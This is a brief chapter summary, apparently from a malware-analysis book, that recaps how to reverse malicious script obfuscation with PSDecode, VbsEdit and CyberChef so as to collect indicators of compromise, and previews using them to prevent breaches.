In this chapter, we covered basic obfuscation methods used by threat actors to hide the malicious intent of their script(s), and how to reverse them. With this knowledge, it's now possible for us to recognize attempts to hide data and action on objectives from us.
We can leverage this knowledge with the tools we learned about (PSDecode, VbsEdit, and CyberChef) to collect indicators of compromise (IOCs) and better understand what a malicious script may be trying to do or stage on a system. As a result, we are better prepared to face the first stage of adversarial software head-on.
In the next chapter, we'll review how we can take the IOCs we collect as a result of this and weaponize them against the adversary to prevent breaches in the first place!